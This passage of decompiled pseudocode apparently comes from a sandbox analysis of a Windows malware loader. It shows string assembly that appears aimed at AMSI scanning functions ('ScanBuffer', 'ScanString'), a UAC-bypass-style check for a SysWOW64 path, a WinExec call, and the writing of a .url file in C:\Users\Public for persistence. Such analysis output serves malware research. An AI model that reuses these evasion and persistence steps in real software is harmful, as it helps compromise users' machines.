                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("ScanString");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v3444, E02854964(_v3448));
                                                                                                  									_push(_v3444);
                                                                                                  									_t5009 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v3456, _t5009, 0x2874c4c);
                                                                                                  									E02854698( &_v3452, E02854964(_v3456));
                                                                                                  									_pop(_t5815);
                                                                                                  									E02867B80(_v3452, _t5815);
                                                                                                  									_t5010 =  *0x28a6578; // 0x29ea858
                                                                                                  									E028547B0( &_v3460, _t5010, "C:\\Windows\\System32\\");
                                                                                                  									WinExec(E02854964(_v3460), 0);
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("ScanBuffer");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v3464, E02854964(_v3468));
                                                                                                  									_push(_v3464);
                                                                                                  									_t5011 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v3476, _t5011, 0x2874c4c);
                                                                                                  									E02854698( &_v3472, E02854964(_v3476));
                                                                                                  									_pop(_t5821);
                                                                                                  									E02867B80(_v3472, _t5821);
                                                                                                  									_t3625 =  *0x28a6578; // 0x29ea858
                                                                                                  									E02854698( &_v3480, E02854964(_t3625));
                                                                                                  									E02867FE4(_v3480, _t4897, 0x28a65dc, _t6274, _t6275, __eflags);
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("OpenSession");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v3484, E02854964(_v3488));
                                                                                                  									_push(_v3484);
                                                                                                  									_t5012 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v3496, _t5012, 0x2874c4c);
                                                                                                  									E02854698( &_v3492, E02854964(_v3496));
                                                                                                  									_pop(_t5828);
                                                                                                  									E02867B80(_v3492, _t5828);
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("ScanBuffer");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v3500, E02854964(_v3504));
                                                                                                  									_push(_v3500);
                                                                                                  									_t5013 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v3512, _t5013, 0x2874c4c);
                                                                                                  									E02854698( &_v3508, E02854964(_v3512));
                                                                                                  									_pop(_t5833);
                                                                                                  									E02867B80(_v3508, _t5833);
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("OpenSession");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v3516, E02854964(_v3520));
                                                                                                  									_push(_v3516);
                                                                                                  									_t5014 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v3528, _t5014, 0x2874c4c);
                                                                                                  									E02854698( &_v3524, E02854964(_v3528));
                                                                                                  									_pop(_t5838);
                                                                                                  									E02867B80(_v3524, _t5838);
                                                                                                  									 *0x28a6538 = E02853694(1);
                                                                                                  									_push(_t6277);
                                                                                                  									_push(0x287330b);
                                                                                                  									_push( *[fs:edx]);
                                                                                                  									 *[fs:edx] = _t6278;
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("ScanBuffer");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v3532, E02854964(_v3536));
                                                                                                  									_push(_v3532);
                                                                                                  									_t5015 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v3544, _t5015, 0x2874c4c);
                                                                                                  									E02854698( &_v3540, E02854964(_v3544));
                                                                                                  									_pop(_t5845);
                                                                                                  									E02867B80(_v3540, _t5845);
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("OpenSession");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v3548, E02854964(_v3552));
                                                                                                  									_push(_v3548);
                                                                                                  									_t5016 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v3560, _t5016, 0x2874c4c);
                                                                                                  									E02854698( &_v3556, E02854964(_v3560));
                                                                                                  									_pop(_t5850);
                                                                                                  									E02867B80(_v3556, _t5850);
                                                                                                  									_t3703 =  *0x28a65c4; // 0x7ebd0018
                                                                                                  									_v1016 = _t3703;
                                                                                                  									_t5017 = _v1016;
                                                                                                  									__eflags = _t5017;
                                                                                                  									if(_t5017 != 0) {
                                                                                                  										_t5028 = _t5017 - 4;
                                                                                                  										__eflags = _t5028;
                                                                                                  										_t5017 =  *_t5028;
                                                                                                  									}
                                                                                                  									asm("cdq");
                                                                                                  									_t3705 =  *0x28a6538; // 0x0
                                                                                                  									E0286593C(_t3705, _t5017, _t5850);
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("ScanBuffer");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v3564, E02854964(_v3568));
                                                                                                  									_push(_v3564);
                                                                                                  									_t5018 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v3576, _t5018, 0x2874c4c);
                                                                                                  									E02854698( &_v3572, E02854964(_v3576));
                                                                                                  									_pop(_t5855);
                                                                                                  									E02867B80(_v3572, _t5855);
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("OpenSession");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v3580, E02854964(_v3584));
                                                                                                  									_push(_v3580);
                                                                                                  									_t5019 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v3592, _t5019, 0x2874c4c);
                                                                                                  									E02854698( &_v3588, E02854964(_v3592));
                                                                                                  									_pop(_t5860);
                                                                                                  									E02867B80(_v3588, _t5860);
                                                                                                  									_t3735 =  *0x28a6538; // 0x0
                                                                                                  									_t3736 =  *((intOrPtr*)( *_t3735))();
                                                                                                  									_t5862 =  *0x28a65c4; // 0x7ebd0018
                                                                                                  									_t3737 =  *0x28a6538; // 0x0
                                                                                                  									E02865AE4(_t3737, _t3736 + _t3736 + _t3736 + _t3736, _t5862);
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("ScanBuffer");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v3596, E02854964(_v3600));
                                                                                                  									_push(_v3596);
                                                                                                  									_t5023 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v3608, _t5023, 0x2874c4c);
                                                                                                  									E02854698( &_v3604, E02854964(_v3608));
                                                                                                  									_pop(_t5867);
                                                                                                  									E02867B80(_v3604, _t5867);
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("OpenSession");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v3612, E02854964(_v3616));
                                                                                                  									_push(_v3612);
                                                                                                  									_t5024 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v3624, _t5024, 0x2874c4c);
                                                                                                  									E02854698( &_v3620, E02854964(_v3624));
                                                                                                  									_pop(_t5872);
                                                                                                  									E02867B80(_v3620, _t5872);
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("ScanBuffer");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v3628, E02854964(_v3632));
                                                                                                  									_push(_v3628);
                                                                                                  									_t5025 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v3640, _t5025, 0x2874c4c);
                                                                                                  									E02854698( &_v3636, E02854964(_v3640));
                                                                                                  									_pop(_t5877);
                                                                                                  									E02867B80(_v3636, _t5877);
                                                                                                  									_t3781 =  *0x28a65dc; // 0x0
                                                                                                  									_t3782 =  *0x28a6538; // 0x0
                                                                                                  									E02868328(_t4897, _t6274, _t6275, _t3782, _t3781);
                                                                                                  									__eflags = 0;
                                                                                                  									_pop(_t5878);
                                                                                                  									 *[fs:eax] = _t5878;
                                                                                                  									_push(0x2873312);
                                                                                                  									_t3785 =  *0x28a6538; // 0x0
                                                                                                  									return E028536C4(_t3785);
                                                                                                  								}
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							_push( *0x28a65d0);
                                                                                                  							_push(0x2874de8);
                                                                                                  							_push(0x2874ec4);
                                                                                                  							_push(0);
                                                                                                  							_push(0);
                                                                                                  							_push(0);
                                                                                                  							_push(0);
                                                                                                  							_push(0);
                                                                                                  							_push(0x2874ed0);
                                                                                                  							_push(0);
                                                                                                  							_push(0);
                                                                                                  							_push(0);
                                                                                                  							_push(0);
                                                                                                  							_push(0);
                                                                                                  							_push(0x2874eb8);
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v2300, E02854964(_v2304));
                                                                                                  							_t3793 = E02857E40(_v2300);
                                                                                                  							__eflags = _t3793;
                                                                                                  							if(_t3793 != 0) {
                                                                                                  								goto L32;
                                                                                                  							} else {
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("ScanString");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v2308, E02854964(_v2312));
                                                                                                  								_push(_v2308);
                                                                                                  								_t5029 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v2320, _t5029, 0x2874c4c);
                                                                                                  								E02854698( &_v2316, E02854964(_v2320));
                                                                                                  								_pop(_t5885); // executed
                                                                                                  								E02867B80(_v2316, _t5885); // executed
                                                                                                  								E02854698( &_v2324, "C:\\Windows\\SysWOW64");
                                                                                                  								_t3811 = E02857E64(_v2324);
                                                                                                  								__eflags = _t3811;
                                                                                                  								if(_t3811 == 0) {
                                                                                                  									goto L32;
                                                                                                  								} else {
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("Initialize");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v2328, E02854964(_v2332));
                                                                                                  									_push(_v2328);
                                                                                                  									_t5030 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v2340, _t5030, 0x2874c4c);
                                                                                                  									E02854698( &_v2336, E02854964(_v2340));
                                                                                                  									_pop(_t5891); // executed
                                                                                                  									E02867B80(_v2336, _t5891); // executed
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("OpenSession");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v2344, E02854964(_v2348));
                                                                                                  									_push(_v2344);
                                                                                                  									_t5031 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v2356, _t5031, 0x2874c4c);
                                                                                                  									E02854698( &_v2352, E02854964(_v2356));
                                                                                                  									_pop(_t5896); // executed
                                                                                                  									E02867B80(_v2352, _t5896); // executed
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("ScanBuffer");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v2360, E02854964(_v2364));
                                                                                                  									_push(_v2360);
                                                                                                  									_t5032 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v2372, _t5032, 0x2874c4c);
                                                                                                  									E02854698( &_v2368, E02854964(_v2372));
                                                                                                  									_pop(_t5901); // executed
                                                                                                  									E02867B80(_v2368, _t5901); // executed
                                                                                                  									 *0x28a65d8 = E02853694(1);
                                                                                                  									 *[fs:eax] = _t6278;
                                                                                                  									E02852F08(0x64);
                                                                                                  									E02857974( &_v2376);
                                                                                                  									_t3861 =  *0x28a65d8; // 0x29cf850
                                                                                                  									 *((intOrPtr*)( *_t3861 + 0x38))( *[fs:eax], 0x287138c, _t6277);
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push(0x2874ef0);
                                                                                                  									_push(0);
                                                                                                  									_push(0);
                                                                                                  									_push(0);
                                                                                                  									_push(0);
                                                                                                  									_push(0);
                                                                                                  									_push(0);
                                                                                                  									_push(0);
                                                                                                  									_push("acS");
                                                                                                  									_push(0);
                                                                                                  									_push(0);
                                                                                                  									_push(0);
                                                                                                  									_push(0);
                                                                                                  									_push(0);
                                                                                                  									_push(0);
                                                                                                  									_push(0);
                                                                                                  									_push("can");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v2380, E02854964(_v2384));
                                                                                                  									_push(_v2380);
                                                                                                  									_t5034 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v2392, _t5034, 0x2874c4c);
                                                                                                  									E02854698( &_v2388, E02854964(_v2392));
                                                                                                  									_pop(_t5909); // executed
                                                                                                  									E02867B80(_v2388, _t5909); // executed
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v2396, E02854964(_v2400));
                                                                                                  									_t3882 =  *0x28a65d8; // 0x29cf850
                                                                                                  									 *((intOrPtr*)( *_t3882 + 0x74))(0, 0, 0, 0, 0, 0, 0, 0x2874ed0, 0, 0, 0, 0, 0, 0, 0, 0x2874ec4, 0x2874de8,  *0x28a65d0);
                                                                                                  									__eflags = 0;
                                                                                                  									_t5913 = 0x2874eb8;
                                                                                                  									 *[fs:eax] = _t5913;
                                                                                                  									_push(0x2871393);
                                                                                                  									_t3885 =  *0x28a65d8; // 0x29cf850
                                                                                                  									return E028536C4(_t3885); // executed
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						_push("C:\\Users\\Public\\");
                                                                                                  						_push( *0x28a6620);
                                                                                                  						_push(".url");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v1560, E02854964(_v1564));
                                                                                                  						if(E02857E40(_v1560) != 0) {
                                                                                                  							goto L28;
                                                                                                  						} else {
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("UacInitialize");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1568, E02854964(_v1572));
                                                                                                  							_push(_v1568);
                                                                                                  							_t5038 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1580, _t5038, 0x2874c4c);
                                                                                                  							E02854698( &_v1576, E02854964(_v1580));
                                                                                                  							_pop(_t5920); // executed
                                                                                                  							E02867B80(_v1576, _t5920); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanString");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1584, E02854964(_v1588));
                                                                                                  							_push(_v1584);
                                                                                                  							_t5039 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1596, _t5039, 0x2874c4c);
                                                                                                  							E02854698( &_v1592, E02854964(_v1596));
                                                                                                  							_pop(_t5925); // executed
                                                                                                  							E02867B80(_v1592, _t5925); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1600, E02854964(_v1604));
                                                                                                  							_push(_v1600);
                                                                                                  							_t5040 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1612, _t5040, 0x2874c4c);
                                                                                                  							E02854698( &_v1608, E02854964(_v1612));
                                                                                                  							_pop(_t5930); // executed
                                                                                                  							E02867B80(_v1608, _t5930); // executed
                                                                                                  							_push( *0x28a65d0);
                                                                                                  							_push(0x2874de8);
                                                                                                  							_push( *0x28a6620);
                                                                                                  							E02854824();
                                                                                                  							E02854698(0x28a661c, E02854964(_v1616));
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1620, E02854964(_v1624));
                                                                                                  							_push(_v1620);
                                                                                                  							_t5041 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1632, _t5041, 0x2874c4c);
                                                                                                  							E02854698( &_v1628, E02854964(_v1632));
                                                                                                  							_pop(_t5937); // executed
                                                                                                  							E02867B80(_v1628, _t5937); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("Initialize");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1636, E02854964(_v1640));
                                                                                                  							_push(_v1636);
                                                                                                  							_t5042 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1648, _t5042, 0x2874c4c);
                                                                                                  							E02854698( &_v1644, E02854964(_v1648));
                                                                                                  							_pop(_t5942); // executed
                                                                                                  							E02867B80(_v1644, _t5942); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanBuffer");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1652, E02854964(_v1656));
                                                                                                  							_push(_v1652);
                                                                                                  							_t5043 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1664, _t5043, 0x2874c4c);
                                                                                                  							E02854698( &_v1660, E02854964(_v1664));
                                                                                                  							_pop(_t5947); // executed
                                                                                                  							E02867B80(_v1660, _t5947); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1668, E02854964(_v1672));
                                                                                                  							_push(_v1668);
                                                                                                  							_t5044 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1680, _t5044, 0x2874c4c);
                                                                                                  							E02854698( &_v1676, E02854964(_v1680));
                                                                                                  							_pop(_t5952); // executed
                                                                                                  							E02867B80(_v1676, _t5952); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanString");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1684, E02854964(_v1688));
                                                                                                  							_push(_v1684);
                                                                                                  							_t5045 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1696, _t5045, 0x2874c4c);
                                                                                                  							E02854698( &_v1692, E02854964(_v1696));
                                                                                                  							_pop(_t5957); // executed
                                                                                                  							E02867B80(_v1692, _t5957); // executed
                                                                                                  							_push("C:\\\\Users\\\\Public\\\\Libraries\\\\");
                                                                                                  							_push( *0x28a6620);
                                                                                                  							_push(0x2874e1c);
                                                                                                  							_push(0);
                                                                                                  							_push(0);
                                                                                                  							_push(0);
                                                                                                  							_push(0);
                                                                                                  							_push(0x2874e28);
                                                                                                  							_push(0);
                                                                                                  							_push(0);
                                                                                                  							_push(0);
                                                                                                  							_push(0);
                                                                                                  							_push(0x2874e34);
                                                                                                  							E02854824();
                                                                                                  							E02854698(0x28a6544, E02854964(_v1700));
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("UacScan");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1704, E02854964(_v1708));
                                                                                                  							_push(_v1704);
                                                                                                  							_t5046 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1716, _t5046, 0x2874c4c);
                                                                                                  							E02854698( &_v1712, E02854964(_v1716));
                                                                                                  							_pop(_t5964); // executed
                                                                                                  							E02867B80(_v1712, _t5964); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanBuffer");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1720, E02854964(_v1724));
                                                                                                  							_push(_v1720);
                                                                                                  							_t5047 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1732, _t5047, 0x2874c4c);
                                                                                                  							E02854698( &_v1728, E02854964(_v1732));
                                                                                                  							_pop(_t5969); // executed
                                                                                                  							E02867B80(_v1728, _t5969); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("Initialize");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1736, E02854964(_v1740));
                                                                                                  							_push(_v1736);
                                                                                                  							_t5048 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1748, _t5048, 0x2874c4c);
                                                                                                  							E02854698( &_v1744, E02854964(_v1748));
                                                                                                  							_pop(_t5974); // executed
                                                                                                  							E02867B80(_v1744, _t5974); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanString");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1752, E02854964(_v1756));
                                                                                                  							_push(_v1752);
                                                                                                  							_t5049 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1764, _t5049, 0x2874c4c);
                                                                                                  							E02854698( &_v1760, E02854964(_v1764));
                                                                                                  							_pop(_t5979); // executed
                                                                                                  							E02867B80(_v1760, _t5979); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1768, E02854964(_v1772));
                                                                                                  							_push(_v1768);
                                                                                                  							_t5050 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1780, _t5050, 0x2874c4c);
                                                                                                  							E02854698( &_v1776, E02854964(_v1780));
                                                                                                  							_pop(_t5984); // executed
                                                                                                  							E02867B80(_v1776, _t5984); // executed
                                                                                                  							_t5985 =  *0x28a6544; // 0x29e3448
                                                                                                  							E02854DA4( &_v1784, _t5985);
                                                                                                  							_push(_v1784);
                                                                                                  							_t5986 =  *0x28a65cc; // 0x7faf0018
                                                                                                  							E02854DA4( &_v1792, _t5986);
                                                                                                  							E02854728( &_v1788, _v1792);
                                                                                                  							_pop(_t5988); // executed
                                                                                                  							E0286BCF4(_v1788, _t4897, _t5988, _t6275); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1796, E02854964(_v1800));
                                                                                                  							_push(_v1796);
                                                                                                  							_t5051 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1808, _t5051, 0x2874c4c);
                                                                                                  							E02854698( &_v1804, E02854964(_v1808));
                                                                                                  							_pop(_t5993); // executed
                                                                                                  							E02867B80(_v1804, _t5993); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanString");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1812, E02854964(_v1816));
                                                                                                  							_push(_v1812);
                                                                                                  							_t5052 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1824, _t5052, 0x2874c4c);
                                                                                                  							E02854698( &_v1820, E02854964(_v1824));
                                                                                                  							_pop(_t5998); // executed
                                                                                                  							E02867B80(_v1820, _t5998); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1828, E02854964(_v1832));
                                                                                                  							_push(_v1828);
                                                                                                  							_t5053 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1840, _t5053, 0x2874c4c);
                                                                                                  							E02854698( &_v1836, E02854964(_v1840));
                                                                                                  							_pop(_t6003); // executed
                                                                                                  							E02867B80(_v1836, _t6003); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanBuffer");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1844, E02854964(_v1848));
                                                                                                  							_push(_v1844);
                                                                                                  							_t5054 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1856, _t5054, 0x2874c4c);
                                                                                                  							E02854698( &_v1852, E02854964(_v1856));
                                                                                                  							_pop(_t6008); // executed
                                                                                                  							E02867B80(_v1852, _t6008); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("Initialize");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1860, E02854964(_v1864));
                                                                                                  							_push(_v1860);
                                                                                                  							_t5055 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1872, _t5055, 0x2874c4c);
                                                                                                  							E02854698( &_v1868, E02854964(_v1872));
                                                                                                  							_pop(_t6013); // executed
                                                                                                  							E02867B80(_v1868, _t6013); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanBuffer");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1876, E02854964(_v1880));
                                                                                                  							_push(_v1876);
                                                                                                  							_t5056 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1888, _t5056, 0x2874c4c);
                                                                                                  							E02854698( &_v1884, E02854964(_v1888));
                                                                                                  							_pop(_t6018); // executed
                                                                                                  							E02867B80(_v1884, _t6018); // executed
                                                                                                  							 *0x28a65d8 = E02853694(1);
                                                                                                  							_push(_t6277);
                                                                                                  							_push(0x28706fd);
                                                                                                  							_push( *[fs:eax]);
                                                                                                  							 *[fs:eax] = _t6278;
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1892, E02854964(_v1896));
                                                                                                  							_push(_v1892);
                                                                                                  							_t5057 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1904, _t5057, 0x2874c4c);
                                                                                                  							E02854698( &_v1900, E02854964(_v1904));
                                                                                                  							_pop(_t6024); // executed
                                                                                                  							E02867B80(_v1900, _t6024); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanString");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1908, E02854964(_v1912));
                                                                                                  							_push(_v1908);
                                                                                                  							_t5058 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1920, _t5058, 0x2874c4c);
                                                                                                  							E02854698( &_v1916, E02854964(_v1920));
                                                                                                  							_pop(_t6029); // executed
                                                                                                  							E02867B80(_v1916, _t6029); // executed
                                                                                                  							_t4210 =  *0x28a65d8; // 0x29cf850
                                                                                                  							 *((intOrPtr*)( *_t4210 + 0x38))();
                                                                                                  							E02854824();
                                                                                                  							_t4213 =  *0x28a65d8; // 0x29cf850
                                                                                                  							 *((intOrPtr*)( *_t4213 + 0x38))(0x2874e70,  *0x28a6544, "URL=file:\"");
                                                                                                  							E02852F08(0x3a);
                                                                                                  							E02857974( &_v1932);
                                                                                                  							E028547B0( &_v1928, _v1932, "IconIndex=");
                                                                                                  							_t4221 =  *0x28a65d8; // 0x29cf850
                                                                                                  							 *((intOrPtr*)( *_t4221 + 0x38))();
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1936, E02854964(_v1940));
                                                                                                  							_push(_v1936);
                                                                                                  							_t5063 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1948, _t5063, 0x2874c4c);
                                                                                                  							E02854698( &_v1944, E02854964(_v1948));
                                                                                                  							_pop(_t6040); // executed
                                                                                                  							E02867B80(_v1944, _t6040); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanString");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1952, E02854964(_v1956));
                                                                                                  							_push(_v1952);
                                                                                                  							_t5064 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1964, _t5064, 0x2874c4c);
                                                                                                  							E02854698( &_v1960, E02854964(_v1964));
                                                                                                  							_pop(_t6045); // executed
                                                                                                  							E02867B80(_v1960, _t6045); // executed
                                                                                                  							E02852F08(0x63);
                                                                                                  							E02857974( &_v1972);
                                                                                                  							E028547B0( &_v1968, _v1972, "HotKey=");
                                                                                                  							_t4257 =  *0x28a65d8; // 0x29cf850
                                                                                                  							 *((intOrPtr*)( *_t4257 + 0x38))();
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanString");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1976, E02854964(_v1980));
                                                                                                  							_push(_v1976);
                                                                                                  							_t5067 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1988, _t5067, 0x2874c4c);
                                                                                                  							E02854698( &_v1984, E02854964(_v1988));
                                                                                                  							_pop(_t6053); // executed
                                                                                                  							E02867B80(_v1984, _t6053); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1992, E02854964(_v1996));
                                                                                                  							_push(_v1992);
                                                                                                  							_t5068 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v2004, _t5068, 0x2874c4c);
                                                                                                  							E02854698( &_v2000, E02854964(_v2004));
                                                                                                  							_pop(_t6058); // executed
                                                                                                  							E02867B80(_v2000, _t6058); // executed
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v2008, E02854964(_v2012));
                                                                                                  							_t4292 =  *0x28a65d8; // 0x29cf850
                                                                                                  							 *((intOrPtr*)( *_t4292 + 0x74))(0, 0, 0, 0, 0x2874eac, 0, 0, 0, 0, 0x2874ea0,  *0x28a6620, "C:\\Users\\Public\\");
                                                                                                  							_t6062 = 0x2874eb8;
